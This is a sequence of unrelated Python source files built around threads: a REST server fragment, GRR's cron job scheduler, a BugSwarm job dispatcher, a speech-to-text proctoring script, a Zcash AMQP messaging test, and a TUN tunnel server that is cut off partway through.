GlobalModule.EM_LOGGER.debug(
'startup class name generation:%s', rest_scenario_name)
lib_path = GlobalModule.EM_LIB_PATH
GlobalModule.EM_LOGGER.debug('environment path:%s', lib_path)
filepath, filename, data =\
imp.find_module(
rest_scenario_name, [os.path.join(lib_path, 'RestScenario')])
GlobalModule.EM_LOGGER.debug('search modules')
scenario_mod = imp.load_module(
rest_scenario_name, filepath, filename, data)
GlobalModule.EM_LOGGER.debug('load modules')
scenario_ins = getattr(scenario_mod, rest_scenario_name)()
GlobalModule.EM_LOGGER.debug('instantiation')
return scenario_ins
@decorater_log
def _execute_scenario(scenario_ins, *arg, **kwargs):
'''
Execute scenario.
'''
GlobalModule.EM_LOGGER.debug('execute scenario : %s' % (scenario_ins,))
return scenario_ins.execute(*arg, **kwargs)
class EmRestServer(object):
'''
REST server class
'''
@decorater_log
def __init__(self, address=None, port=None):
'''
Constructor
'''
self._rest_address = address
self._rest_port = port
self.rest_thread = None
@decorater_log_in_out
def start(self):
'''
REST server launching method
'''
self.rest_thread = threading.Thread(target=self._run_server)
self.rest_thread.setDaemon(True)
self.rest_thread.start()
GlobalModule.EM_LOGGER.info("110001 REST Server Start")
return True
@decorater_log
def _run_server(self):
'''
REST server launching method (execute app.run)
'''
application.run(host=self._rest_address, port=self._rest_port,
threaded=True)
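# A minimal start-up sketch (address and port are placeholders): the Flask app
# runs in a daemon thread, so the caller must keep the main thread alive after
# start() returns.
#   server = EmRestServer(address='0.0.0.0', port=8080)
#   server.start()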
|
cronjobs.py
|
#!/usr/bin/env python
"""Cron management classes."""
import logging
import random
import threading
import time
from grr import config
from grr.lib import rdfvalue
from grr.lib import registry
from grr.lib import stats
from grr.lib import utils
from grr.lib.rdfvalues import cronjobs as rdf_cronjobs
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import protodict as rdf_protodict
from grr.lib.rdfvalues import structs as rdf_structs
from grr_response_proto import flows_pb2
from grr.server import access_control
from grr.server import aff4
from grr.server import flow
from grr.server import master
from grr.server import queue_manager
class Error(Exception):
pass
class CreateCronJobFlowArgs(rdf_structs.RDFProtoStruct):
protobuf = flows_pb2.CreateCronJobFlowArgs
rdf_deps = [
rdfvalue.Duration,
rdf_flows.FlowRunnerArgs,
rdfvalue.RDFDatetime,
]
def GetFlowArgsClass(self):
if self.flow_runner_args.flow_name:
flow_cls = flow.GRRFlow.classes.get(self.flow_runner_args.flow_name)
if flow_cls is None:
raise ValueError("Flow '%s' not known by this implementation." %
self.flow_runner_args.flow_name)
# The required protobuf for this class is in args_type.
return flow_cls.args_type
class CronManager(object):
"""CronManager is used to schedule/terminate cron jobs."""
CRON_JOBS_PATH = rdfvalue.RDFURN("aff4:/cron")
def ScheduleFlow(self,
cron_args=None,
job_name=None,
token=None,
disabled=False):
"""Creates a cron job that runs given flow with a given frequency.
Args:
cron_args: A protobuf of type CreateCronJobFlowArgs.
job_name: Use this job_name instead of an autogenerated unique name (used
for system cron jobs - we want them to have well-defined
persistent name).
token: Security token used for data store access.
disabled: If True, the job object will be created, but will be disabled.
Returns:
URN of the cron job created.
"""
if not job_name:
uid = utils.PRNG.GetUShort()
job_name = "%s_%s" % (cron_args.flow_runner_args.flow_name, uid)
cron_job_urn = self.CRON_JOBS_PATH.Add(job_name)
with aff4.FACTORY.Create(
cron_job_urn,
aff4_type=CronJob,
mode="rw",
token=token,
force_new_version=False) as cron_job:
# If the cronjob was already present we don't want to overwrite the
# original start_time.
existing_cron_args = cron_job.Get(cron_job.Schema.CRON_ARGS)
if existing_cron_args and existing_cron_args.start_time:
cron_args.start_time = existing_cron_args.start_time
if cron_args != existing_cron_args:
cron_job.Set(cron_job.Schema.CRON_ARGS(cron_args))
if disabled != cron_job.Get(cron_job.Schema.DISABLED):
cron_job.Set(cron_job.Schema.DISABLED(disabled))
return cron_job_urn
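  # A hedged usage sketch (the flow name and token below are illustrative
  # placeholders; the fields mirror how ScheduleSystemCronFlows() builds them):
  #   cron_args = CreateCronJobFlowArgs(periodicity=rdfvalue.Duration("1d"))
  #   cron_args.flow_runner_args.flow_name = "SomeMaintenanceFlow"
  #   CRON_MANAGER.ScheduleFlow(cron_args=cron_args, token=token)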
def ListJobs(self, token=None):
"""Returns a generator of URNs of all currently running cron jobs."""
return aff4.FACTORY.Open(self.CRON_JOBS_PATH, token=token).ListChildren()
def EnableJob(self, job_urn, token=None):
"""Enable cron job with the given URN."""
cron_job = aff4.FACTORY.Open(
job_urn, mode="rw", aff4_type=CronJob, token=token)
cron_job.Set(cron_job.Schema.DISABLED(0))
cron_job.Close()
def DisableJob(self, job_urn, token=None):
"""Disable cron job with the given URN."""
cron_job = aff4.FACTORY.Open(
job_urn, mode="rw", aff4_type=CronJob, token=token)
cron_job.Set(cron_job.Schema.DISABLED(1))
cron_job.Close()
def DeleteJob(self, job_urn, token=None):
"""Deletes cron job with the given URN."""
aff4.FACTORY.Delete(job_urn, token=token)
def RunOnce(self, token=None, force=False, urns=None):
"""Tries to lock and run cron jobs.
Args:
token: security token
force: If True, force a run
urns: List of URNs to run. If unset, run them all
"""
urns = urns or self.ListJobs(token=token)
for cron_job_urn in urns:
try:
with aff4.FACTORY.OpenWithLock(
cron_job_urn, blocking=False, token=token,
lease_time=600) as cron_job:
try:
logging.info("Running cron job: %s", cron_job.urn)
cron_job.Run(force=force)
except Exception as e: # pylint: disable=broad-except
logging.exception("Error processing cron job %s: %s", cron_job.urn,
e)
stats.STATS.IncrementCounter("cron_internal_error")
except aff4.LockError:
pass
CRON_MANAGER = CronManager()
class SystemCronFlow(flow.GRRFlow):
"""SystemCronFlows are scheduled automatically on workers startup."""
frequency = rdfvalue.Duration("1d")
lifetime = rdfvalue.Duration("20h")
allow_overruns = False
# By default we randomize the start time of system cron flows between 0 and
# 'frequency' seconds after it is first created. This only affects the very
# first run, after which they will run at 'frequency' intervals. Disable this
# behaviour by setting start_time_randomization = False.
start_time_randomization = True
# Jobs that are broken, or are under development can be disabled using
# the "disabled" attribute. These jobs won't get scheduled automatically,
# and will get paused if they were scheduled before.
disabled = False
__abstract = True # pylint: disable=g-bad-name
def _ValidateState(self):
# For normal flows it's a bug to write an empty state, here it's ok.
pass
class StateReadError(Error):
pass
class StateWriteError(Error):
pass
class StatefulSystemCronFlow(SystemCronFlow):
"""SystemCronFlow that keeps a permanent state between iterations."""
__abstract = True
@property
def cron_job_urn(self):
return CRON_MANAGER.CRON_JOBS_PATH.Add(self.__class__.__name__)
def ReadCronState(self):
try:
cron_job = aff4.FACTORY.Open(
self.cron_job_urn, aff4_type=CronJob, token=self.token)
res = cron_job.Get(cron_job.Schema.STATE_DICT)
if res:
return flow.AttributedDict(res.ToDict())
return flow.AttributedDict()
except aff4.InstantiationError as e:
raise StateReadError(e)
def WriteCronState(self, state):
try:
with aff4.FACTORY.OpenWithLock(
self.cron_job_urn, aff4_type=CronJob, token=self.token) as cron_job:
cron_job.Set(cron_job.Schema.STATE_DICT(state))
except aff4.InstantiationError as e:
raise StateWriteError(e)
def GetStartTime(cron_cls):
"""Get start time for a SystemCronFlow class.
If start_time_randomization is True in the class, randomise the start
time to be between now and (now + frequency)
Args:
cron_cls: SystemCronFlow class
Returns:
rdfvalue.RDFDatetime
"""
if not cron_cls.start_time_randomization:
return rdfvalue.RDFDatetime.Now()
now = rdfvalue.RDFDatetime.Now()
window_ms = cron_cls.frequency.microseconds
start_time_ms = random.randint(now.AsMicroSecondsFromEpoch(),
now.AsMicroSecondsFromEpoch() + window_ms)
return rdfvalue.RDFDatetime(start_time_ms)
def ScheduleSystemCronFlows(names=None, token=None):
"""Schedule all the SystemCronFlows found."""
for name in config.CONFIG["Cron.disabled_system_jobs"]:
try:
cls = flow.GRRFlow.classes[name]
except KeyError:
raise KeyError("No such flow: %s." % name)
if not aff4.issubclass(cls, SystemCronFlow):
raise ValueError("Disabled system cron job name doesn't correspond to "
"a flow inherited from SystemCronFlow: %s" % name)
if names is None:
names = flow.GRRFlow.classes.keys()
for name in names:
cls = flow.GRRFlow.classes[name]
if aff4.issubclass(cls, SystemCronFlow):
cron_args = CreateCronJobFlowArgs(periodicity=cls.frequency)
cron_args.flow_runner_args.flow_name = name
cron_args.lifetime = cls.lifetime
cron_args.allow_overruns = cls.allow_overruns
cron_args.start_time = GetStartTime(cls)
if cls.disabled:
disabled = True
else:
disabled = name in config.CONFIG["Cron.disabled_system_jobs"]
CRON_MANAGER.ScheduleFlow(
cron_args=cron_args, job_name=name, token=token, disabled=disabled)
class CronWorker(object):
"""CronWorker runs a thread that periodically executes cron jobs."""
def __init__(self, thread_name="grr_cron", sleep=60 * 5):
self.thread_name = thread_name
self.sleep = sleep
# SetUID is required to write cronjobs under aff4:/cron/
self.token = access_control.ACLToken(
username="GRRCron", reason="Implied.").SetUID()
def _RunLoop(self):
ScheduleSystemCronFlows(token=self.token)
while True:
if not master.MASTER_WATCHER.IsMaster():
time.sleep(self.sleep)
continue
try:
CRON_MANAGER.RunOnce(token=self.token)
except Exception as e: # pylint: disable=broad-except
logging.error("CronWorker uncaught exception: %s", e)
time.sleep(self.sleep)
def Run(self):
"""Runs a working thread and waits for it to finish."""
self.RunAsync().join()
def RunAsync(self):
"""Runs a working thread and returns immediately."""
self.running_thread = threading.Thread(
name=self.thread_name, target=self._RunLoop)
self.running_thread.daemon = True
self.running_thread.start()
return self.running_thread
class CronJob(aff4.AFF4Volume):
"""AFF4 object corresponding to cron jobs."""
class SchemaCls(aff4.AFF4Volume.SchemaCls):
"""Schema for CronJob AFF4 object."""
CRON_ARGS = aff4.Attribute("aff4:cron/args", CreateCronJobFlowArgs,
"This cron jobs' arguments.")
DISABLED = aff4.Attribute(
"aff4:cron/disabled",
rdfvalue.RDFBool,
"If True, don't run this job.",
versioned=False)
CURRENT_FLOW_URN = aff4.Attribute(
"aff4:cron/current_flow_urn",
rdfvalue.RDFURN,
"URN of the currently running flow corresponding to this cron job.",
versioned=False,
lock_protected=True)
LAST_RUN_TIME = aff4.Attribute(
"aff4:cron/last_run",
rdfvalue.RDFDatetime,
"The last time this cron job ran.",
"last_run",
versioned=False,
lock_protected=True)
LAST_RUN_STATUS = aff4.Attribute(
"aff4:cron/last_run_status",
rdf_cronjobs.CronJobRunStatus,
"Result of the last flow",
lock_protected=True,
creates_new_object_version=False)
STATE_DICT = aff4.Attribute(
"aff4:cron/state_dict",
rdf_protodict.AttributedDict,
"Cron flow state that is kept between iterations",
lock_protected=True,
versioned=False)
def DeleteJobFlows(self, age=None):
"""Deletes flows initiated by the job that are older than specified."""
if age is None:
raise ValueError("age can't be None")
child_flows = list(self.ListChildren(age=age))
with queue_manager.QueueManager(token=self.token) as queuemanager:
queuemanager.MultiDestroyFlowStates(child_flows)
aff4.FACTORY.MultiDelete(child_flows, token=self.token)
def IsRunning(self):
"""Returns True if there's a currently running iteration of this job."""
current_urn = self.Get(self.Schema.CURRENT_FLOW_URN)
if current_urn:
try:
current_flow = aff4.FACTORY.Open(
urn=current_urn, aff4_type=flow.GRRFlow, token=self.token, mode="r")
except aff4.InstantiationError:
# This isn't a flow, something went really wrong, clear it out.
self.DeleteAttribute(self.Schema.CURRENT_FLOW_URN)
self.Flush()
return False
runner = current_flow.GetRunner()
return runner.context.state == rdf_flows.FlowContext.State.RUNNING
return False
def DueToRun(self):
"""Called periodically by the cron daemon, if True Run() will be called.
Returns:
True if it is time to run based on the specified frequency.
"""
if self.Get(self.Schema.DISABLED):
return False
cron_args = self.Get(self.Schema.CRON_ARGS)
last_run_time = self.Get(self.Schema.LAST_RUN_TIME)
now = rdfvalue.RDFDatetime.Now()
    # It's time to run.
if (last_run_time is None or
now > cron_args.periodicity.Expiry(last_run_time)):
# Not due to start yet.
if now < cron_args.start_time:
return False
# Do we allow overruns?
if cron_args.allow_overruns:
return True
# No currently executing job - lets go.
if self.Get(self.Schema.CURRENT_FLOW_URN) is None:
return True
return False
def StopCurrentRun(self, reason="Cron lifetime exceeded.", force=True):
current_flow_urn = self.Get(self.Schema.CURRENT_FLOW_URN)
if current_flow_urn:
flow.GRRFlow.TerminateFlow(
current_flow_urn, reason=reason, force=force, token=self.token)
self.Set(
self.Schema.LAST_RUN_STATUS,
rdf_cronjobs.CronJobRunStatus(
status=rdf_cronjobs.CronJobRunStatus.Status.TIMEOUT))
self.DeleteAttribute(self.Schema.CURRENT_FLOW_URN)
self.Flush()
def KillOldFlows(self):
"""Disable cron flow if it has exceeded CRON_ARGS.lifetime.
Returns:
      bool: True if the flow was killed, False if it is still alive
"""
if self.IsRunning():
start_time = self.Get(self.Schema.LAST_RUN_TIME)
lifetime = self.Get(self.Schema.CRON_ARGS).lifetime
elapsed = time.time() - start_time.AsSecondsFromEpoch()
if lifetime and elapsed > lifetime.seconds:
self.StopCurrentRun()
stats.STATS.IncrementCounter(
"cron_job_timeout", fields=[self.urn.Basename()])
stats.STATS.RecordEvent(
"cron_job_latency", elapsed, fields=[self.urn.Basename()])
return True
return False
def Run(self, force=False):
"""Do the actual work of the Cron. Will first check if DueToRun is True.
CronJob object must be locked (i.e. opened via OpenWithLock) for Run() to be
called.
Args:
force: If True, the job will run no matter what (i.e. even if DueToRun()
returns False).
Raises:
LockError: if the object is not locked.
"""
if not self.locked:
raise aff4.LockError("CronJob must be locked for Run() to be called.")
self.KillOldFlows()
# If currently running flow has finished, update our state.
current_flow_urn = self.Get(self.Schema.CURRENT_FLOW_URN)
if current_flow_urn:
current_flow = aff4.FACTORY.Open(current_flow_urn, token=self.token)
runner = current_flow.GetRunner()
if not runner.IsRunning():
if runner.context.state == rdf_flows.FlowContext.State.ERROR:
self.Set(
self.Schema.LAST_RUN_STATUS,
rdf_cronjobs.CronJobRunStatus(
status=rdf_cronjobs.CronJobRunStatus.Status.ERROR))
stats.STATS.IncrementCounter(
"cron_job_failure", fields=[self.urn.Basename()])
else:
self.Set(
self.Schema.LAST_RUN_STATUS,
rdf_cronjobs.CronJobRunStatus(
status=rdf_cronjobs.CronJobRunStatus.Status.OK))
start_time = self.Get(self.Schema.LAST_RUN_TIME)
elapsed = time.time() - start_time.AsSecondsFromEpoch()
stats.STATS.RecordEvent(
"cron_job_latency", elapsed, fields=[self.urn.Basename()])
self.DeleteAttribute(self.Schema.CURRENT_FLOW_URN)
self.Flush()
if not force and not self.DueToRun():
return
# Make sure the flow is created with cron job as a parent folder.
cron_args = self.Get(self.Schema.CRON_ARGS)
cron_args.flow_runner_args.base_session_id = self.urn
flow_urn = flow.GRRFlow.StartFlow(
runner_args=cron_args.flow_runner_args,
args=cron_args.flow_args,
token=self.token,
sync=False)
self.Set(self.Schema.CURRENT_FLOW_URN, flow_urn)
self.Set(self.Schema.LAST_RUN_TIME, rdfvalue.RDFDatetime.Now())
self.Flush()
class CronHook(registry.InitHook):
pre = [aff4.AFF4InitHook, master.MasterInit]
def RunOnce(self):
"""Main CronHook method."""
stats.STATS.RegisterCounterMetric("cron_internal_error")
stats.STATS.RegisterCounterMetric(
"cron_job_failure", fields=[("cron_job_name", str)])
stats.STATS.RegisterCounterMetric(
"cron_job_timeout", fields=[("cron_job_name", str)])
stats.STATS.RegisterEventMetric(
"cron_job_latency", fields=[("cron_job_name", str)])
# Start the cron thread if configured to.
if config.CONFIG["Cron.active"]:
self.cron_worker = CronWorker()
self.cron_worker.RunAsync()
|
job_dispatcher.py
|
import os
import time
from multiprocessing import Lock
from multiprocessing import Manager
from multiprocessing import Process
from multiprocessing import Value
from typing import Optional
from bugswarm.common import log
from bugswarm.common.json import read_json
from termcolor import colored
from reproducer.config import Config
from reproducer.docker_wrapper import DockerWrapper
from reproducer.pair_center import PairCenter
from reproducer.reproduce_exception import ReproduceError
from reproducer.utils import Utils
class JobDispatcher(object):
"""
JobDispatcher controls the entire reproducing workflow by dispatching tasks to a pool of worker threads.
Subclasses determine the specific task.
"""
def __init__(self, input_file, task_name, threads=1, keep=False, package_mode=False, dependency_solver=False):
"""
Initializes JobDispatcher with user specified input and starts work.
If `threads` is specified, JobDispatcher will dispatch jobs to be reproduced in each thread. Otherwise, each job
will be reproduced sequentially.
"""
log.info('Initializing job dispatcher.')
self.input_file = input_file
self.thread_num = threads
self.keep = keep
self.package_mode = package_mode
self.dependency_solver = dependency_solver
# -----
self.config = Config(task_name)
self.utils = Utils(self.config)
self.items_processed = Value('i', 0)
self.reproduce_err = Value('i', 0)
self.job_time_acc = 0
self.start_time = time.time()
self.docker = DockerWrapper(self.utils)
self.docker_storage_path = self.docker.setup_docker_storage_path()
self.terminate = Value('i', 0)
self.manager = Manager()
self.lock = Lock()
self.workspace_locks = self.manager.dict()
self.cloned_repos = self.manager.dict()
self.threads = {}
self.error_reasons = {}
self.alive_threads = 0
self.travis_images = None
self.job_center = PairCenter(self.input_file, self.utils, self.package_mode)
def run(self):
"""
The entry point for reproducing jobs. Calls post_run() after all items are processed.
Subclasses must not override this method.
"""
self._base_pre_run()
self.pre_run()
try:
while self.job_center.get_num_remaining_items(self.package_mode):
log.info('Ready to initialize threads.')
if not self.utils.check_disk_space_available():
self.utils.clean_disk_usage(self)
if not self.utils.check_disk_space_available():
msg = 'Still inadequate disk space after removing temporary Reproducer files. Exiting.'
log.error(msg)
raise OSError(msg)
if not self.utils.check_docker_disk_space_available(self.docker_storage_path):
self.utils.clean_docker_disk_usage(self.docker)
if not self.utils.check_docker_disk_space_available(self.docker_storage_path):
msg = 'Still inadequate disk space after removing inactive Docker Images. Exiting.'
log.error(msg)
raise OSError(msg)
self._init_threads()
except KeyboardInterrupt:
log.info('Caught KeyboardInterrupt. Cleaning up before terminating.')
self.terminate.value = 1
else:
self.post_run()
log.info('Done!')
finally:
log.info(self.progress_str())
def _spawn(self, tid):
t = Process(target=self._thread_main, args=(tid,))
thread = {'process': t, 'exit_reason': ''}
self.threads[tid] = thread
t.start()
def _thread_watcher(self):
"""
Repeatedly check if process is alive.
"""
log.info('Initialized', len(self.threads), 'threads.')
count = 0
old_str = self.progress_str()
while True:
time.sleep(3)
count += 1
if count == 6:
count = 0
self.update_local_files() # Update local files every 3*6 seconds.
if self.terminate.value:
log.info(colored('Waiting for threads...', 'blue'))
# elif not self.utils.check_disk_space_available():
# log.warning(colored('Not enough disk space. Joining threads...', 'yellow'))
# self.terminate.value = 1
alive_threads = 0
for tid in self.threads:
p = self.threads[tid]['process']
if p.is_alive():
alive_threads += 1
else:
if p.exitcode is None: # Not finished and not running.
# Do error handling and restarting here assigning the new process to processes[n].
self.threads[tid]['exit_reason'] = 'not finished and not running'
self._spawn(tid)
elif p.exitcode != 0:
self.threads[tid]['exit_reason'] = 'errored or terminated'
# Handle this either by restarting or deleting the entry so it is removed from list.
self._spawn(tid)
else:
self.threads[tid]['exit_reason'] = 'finished'
self.terminate.value = 1
p.join() # Allow cleanup.
self.alive_threads = alive_threads
if not alive_threads:
break
curr_str = self.progress_str()
if curr_str != old_str:
old_str = curr_str
if curr_str:
log.info(curr_str)
def _init_threads(self):
"""
Initialize min(num_threads, number of jobs to reproduce) threads.
"""
self.lock = Lock()
self.workspace_locks = self.manager.dict()
self.cloned_repos = self.manager.dict()
self.threads = {}
self.terminate.value = 0
num_remaining_items = self.job_center.get_num_remaining_items(self.package_mode)
if not num_remaining_items:
log.info('No remaining items. Exiting.')
return 0
self.thread_num = min(self.thread_num, num_remaining_items)
self.job_center.init_queues_for_threads(self.thread_num, self.package_mode)
# Begin initializing threads.
for tid in range(self.thread_num):
self._spawn(tid)
self._thread_watcher()
def _thread_main(self, tid):
"""
This is the target function for each thread.
It receives the work load (a queue) for a given thread from job_center.thread_workloads.
For each item, it calls self.process_item() to run.
:param tid: Thread ID
"""
workload = self.job_center.thread_workloads[tid]
while not workload.empty():
# Break out of the loop if the terminate flag is set.
if self.terminate.value:
return 0
item = workload.get()
# Intentionally catch ReproduceError but allow KeyboardInterrupt to propagate.
try:
self.process_item(item, tid)
except ReproduceError as e:
log.info(colored('[THREAD {}] {} {}'.format(tid, item, e), 'red'))
self.reproduce_err.value += 1
self.record_error_reason(item, str(e))
# Optionally handle failed reproducing here.
log.info('[THREAD {}] Workload complete. Exiting thread.'.format(tid))
def _base_pre_run(self):
if self.job_center.total_jobs < 1:
log.info('No jobs to reproduce. Exiting.')
return
# Set up the required directories.
os.makedirs(self.config.orig_logs_dir, exist_ok=True)
os.makedirs(self.config.output_dir, exist_ok=True)
self.utils.directories_setup()
if os.path.isfile(self.utils.get_error_reason_file_path()):
self.error_reasons = read_json(self.utils.get_error_reason_file_path())
self.error_reasons = self.manager.dict(self.error_reasons)
# Check if commands to Travis work.
if not Utils.is_travis_installed():
            log.error(colored('Commands to Travis are failing unexpectedly. Try restarting your shell and ensure '
                              'your environment is provisioned correctly.', 'red'))
raise Exception('Unexpected state: Commands to Travis are failing unexpectedly.')
# Read travis_images.json.
try:
self.travis_images = read_json(self.config.travis_images_json)
except FileNotFoundError:
log.error(colored(self.config.travis_images_json + ' not found. Exiting.', 'red'))
raise
def pre_run(self):
"""
Called before any items have been processed.
Overriding is optional. Defaults to no-op.
"""
pass
def progress_str(self) -> Optional[str]:
"""
Subclasses should return a string, which will be logged, representing progress at the time the method is called.
Returns None by default, which indicates to the caller that logging the progress should be skipped.
Overriding is optional.
:return: A string representing the dispatcher's progress or None to skip logging the progress.
"""
return None
def update_local_files(self):
"""
Called periodically to allow the dispatcher to update local files as needed.
Overriding is optional. Defaults to no-op.
"""
pass
def process_item(self, item, tid):
"""
Subclasses must override this method to process each item in the workload.
:param item: The item to process.
:param tid: The thread ID tasked with processing the item.
"""
raise NotImplementedError
def record_error_reason(self, item, message):
"""
Overriding is optional. Defaults to no-op.
:param item: The item for which to record an error message.
:param message: The error message to record.
"""
pass
def post_run(self):
"""
Called after all items have been processed.
Overriding is optional. Defaults to no-op.
"""
pass
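# A minimal subclass sketch (class name and input file are illustrative only):
# run() drives the whole workflow, and per the docstrings above subclasses only
# need to override process_item().
#   class LogOnlyDispatcher(JobDispatcher):
#       def process_item(self, item, tid):
#           log.info('[THREAD {}] would reproduce {}'.format(tid, item))
#   LogOnlyDispatcher('input_pairs.json', 'demo-task', threads=2).run()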
|
audio_part.py
|
import speech_recognition as sr
import pyaudio
import wave
import time
import threading
import os
def read_audio(stream, filename):
chunk = 1024 # Record in chunks of 1024 samples
sample_format = pyaudio.paInt16 # 16 bits per sample
channels = 2
fs = 44100 # Record at 44100 samples per second
seconds = 10 # Number of seconds to record at once
filename = filename
frames = [] # Initialize array to store frames
for i in range(0, int(fs / chunk * seconds)):
data = stream.read(chunk)
frames.append(data)
# Save the recorded data as a WAV file
wf = wave.open(filename, 'wb')
wf.setnchannels(channels)
wf.setsampwidth(p.get_sample_size(sample_format))
wf.setframerate(fs)
wf.writeframes(b''.join(frames))
wf.close()
# Stop and close the stream
stream.stop_stream()
stream.close()
def convert(i):
if i >= 0:
sound = 'record' + str(i) +'.wav'
r = sr.Recognizer()
with sr.AudioFile(sound) as source:
r.adjust_for_ambient_noise(source)
print("Converting Audio To Text and saving to file..... ")
audio = r.listen(source)
try:
value = r.recognize_google(audio) ##### API call to google for speech recognition
os.remove(sound)
if str is bytes:
result = u"{}".format(value).encode("utf-8")
else:
result = "{}".format(value)
with open("test.txt","a") as f:
f.write(result)
f.write(" ")
f.close()
except sr.UnknownValueError:
print("")
except sr.RequestError as e:
print("{0}".format(e))
except KeyboardInterrupt:
pass
p = pyaudio.PyAudio() # Create an interface to PortAudio
chunk = 1024 # Record in chunks of 1024 samples
sample_format = pyaudio.paInt16 # 16 bits per sample
channels = 2
fs = 44100
def save_audios(i):
stream = p.open(format=sample_format,channels=channels,rate=fs,
frames_per_buffer=chunk,input=True)
filename = 'record'+str(i)+'.wav'
read_audio(stream, filename)
flag = False  # Set once the final chunk has been recorded, so it is also converted below.
for i in range(30//10): # Number of total seconds to record / Number of seconds per recording
t1 = threading.Thread(target=save_audios, args=[i])
x = i-1
t2 = threading.Thread(target=convert, args=[x]) # send one earlier than being recorded
t1.start()
t2.start()
t1.join()
t2.join()
if i==2:
flag = True
if flag:
convert(i)
p.terminate()
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
file = open("test.txt") ## Student speech file
data = file.read()
file.close()
stop_words = set(stopwords.words('english'))
word_tokens = word_tokenize(data) ######### tokenizing sentence
filtered_sentence = [w for w in word_tokens if not w in stop_words]
filtered_sentence = []
for w in word_tokens: ####### Removing stop words
if w not in stop_words:
filtered_sentence.append(w)
####### creating a final file
f=open('final.txt','w')
for ele in filtered_sentence:
f.write(ele+' ')
f.close()
##### checking whether proctor needs to be alerted or not
file = open("paper.txt") ## Question file
data = file.read()
file.close()
stop_words = set(stopwords.words('english'))
word_tokens = word_tokenize(data) ######### tokenizing sentence
filtered_questions = [w for w in word_tokens if not w in stop_words]
filtered_questions = []
for w in word_tokens: ####### Removing stop words
if w not in stop_words:
filtered_questions.append(w)
def common_member(a, b):
a_set = set(a)
b_set = set(b)
# check length
if len(a_set.intersection(b_set)) > 0:
return(a_set.intersection(b_set))
else:
return([])
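# Example: common_member([1, 2, 3], [2, 3, 4]) returns {2, 3}, while
# common_member([1], [2]) returns [].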
comm = common_member(filtered_questions, filtered_sentence)
print('Number of common elements:', len(comm))
print(comm)
|
proton_test.py
|
#!/usr/bin/env python
# Copyright (c) 2017-2020 The Zcash developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or https://www.opensource.org/licenses/mit-license.php.
#
# Test Proton interface (provides AMQP 1.0 messaging support).
#
# Requirements:
# Python library for Qpid Proton:
# https://pypi.python.org/pypi/python-qpid-proton
# To install:
# pip install python-qpid-proton
#
import sys; assert sys.version_info < (3,), ur"This script does not run under Python 3. Please use Python 2.7.x."
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, bytes_to_hex_str, \
start_nodes
from proton.handlers import MessagingHandler
from proton.reactor import Container
import threading
class Server(MessagingHandler):
def __init__(self, url, limit):
super(Server, self).__init__()
self.url = url
self.counter = limit
self.blockhashes = []
self.txids = []
self.blockseq = -1
self.txidseq = -1
def on_start(self, event):
print "Proton listening on:", self.url
self.container = event.container
self.acceptor = event.container.listen(self.url)
def on_message(self, event):
m = event.message
hash = bytes_to_hex_str(m.body)
sequence = m.properties['x-opt-sequence-number']
if m.subject == "hashtx":
self.txids.append(hash)
# Test that sequence id is incrementing
assert(sequence == 1 + self.txidseq)
self.txidseq = sequence
elif m.subject == "hashblock":
self.blockhashes.append(hash)
# Test that sequence id is incrementing
assert(sequence == 1 + self.blockseq)
self.blockseq = sequence
self.counter = self.counter - 1
if self.counter == 0:
self.container.stop()
class ProtonTest (BitcoinTestFramework):
port = 25672
numblocks = 10 # must be even, as two nodes generate equal number
assert(numblocks % 2 == 0)
def setup_nodes(self):
# Launch proton server in background thread
# It terminates after receiving numblocks * 2 messages (one for coinbase, one for block)
self.server = Server("127.0.0.1:%i" % self.port, self.numblocks * 2)
self.container = Container(self.server)
self.t1 = threading.Thread(target=self.container.run)
self.t1.start()
return start_nodes(4, self.options.tmpdir, extra_args=[
['-experimentalfeatures', '-debug=amqp', '-amqppubhashtx=amqp://127.0.0.1:'+str(self.port),
'-amqppubhashblock=amqp://127.0.0.1:'+str(self.port)],
[],
[],
[]
])
def run_test(self):
self.sync_all()
baseheight = self.nodes[0].getblockcount() # 200 blocks already mined
# generate some blocks
self.nodes[0].generate(self.numblocks/2)
self.sync_all()
self.nodes[1].generate(self.numblocks/2)
self.sync_all()
# wait for server to finish
self.t1.join()
# sequence numbers have already been checked in the server's message handler
# sanity check that we have the right number of block hashes and coinbase txids
assert_equal(len(self.server.blockhashes), self.numblocks)
assert_equal(len(self.server.txids), self.numblocks)
# verify that each block has the correct coinbase txid
for i in xrange(0, self.numblocks):
height = baseheight + i + 1
blockhash = self.nodes[0].getblockhash(height)
assert_equal(blockhash, self.server.blockhashes[i])
resp = self.nodes[0].getblock(blockhash)
coinbase = resp["tx"][0]
assert_equal(coinbase, self.server.txids[i])
if __name__ == '__main__':
ProtonTest().main()
|
tun_server2.py
|
#!/usr/bin/env python3
#coding=utf-8
ADDR = ''
PORT = 6789
READ_BUF = 4096
IP_PKG_FORWARD_SIZE = 128
import socket
from time import ctime,time
from queue import Queue
from struct import pack,unpack
from threading import Thread
from selectors import DefaultSelector,EVENT_READ,EVENT_WRITE
from multiprocessing import Process,Pipe
sock_dict={}
unuse_ip=[ '172.16.10.'+str(x) for x in range(1,255) ]
use_ip=[]
pkg_recv = Queue(IP_PKG_FORWARD_SIZE)
pkg_forward = Queue(IP_PKG_FORWARD_SIZE)
selector = DefaultSelector()
def add_virtual_net(Sock):
add_ip = unuse_ip.pop(0)
sock_dict[add_ip] = Sock
Sock.conn.send(socket.inet_aton(add_ip))
use_ip.append(add_ip)
selector.register(Sock.conn,EVENT_READ)
re_code = Sock.conn.recv(READ_BUF)
if re_code == b'ok':
return 'ok'
else:
return 'err'
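# A hedged client-side counterpart to add_virtual_net() (not part of this
# module): the client reads its assigned tunnel IP (4 raw bytes) and replies
# with b'ok' to complete the handshake.
#   assigned_ip = socket.inet_ntoa(client_sock.recv(4))
#   client_sock.send(b'ok')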
class SockRecvQueue:
    '''Per-client socket wrapper: reassembles length-prefixed IP packets from the TCP stream.'''
    def __init__(self, conn):
        self.conn = conn
        self.cache = b''   # bytes received from the socket but not yet consumed
    def recv_pkg(self):
        '''Return one IP packet (framed by a 2-byte big-endian length prefix), or 'err' if the peer closed.'''
        def recv_more():
            chunk = self.conn.recv(READ_BUF)
            if chunk == b'':
                return 'server exit!'
            self.cache += chunk
        # make sure the 2-byte length header is buffered
        while len(self.cache) < 2:
            if recv_more() == 'server exit!':
                return 'err'
        length = unpack('!H', self.cache[0:2])[0]
        self.cache = self.cache[2:]          # drop the header, keep only payload bytes
        # read until the whole packet is buffered
        while len(self.cache) < length:
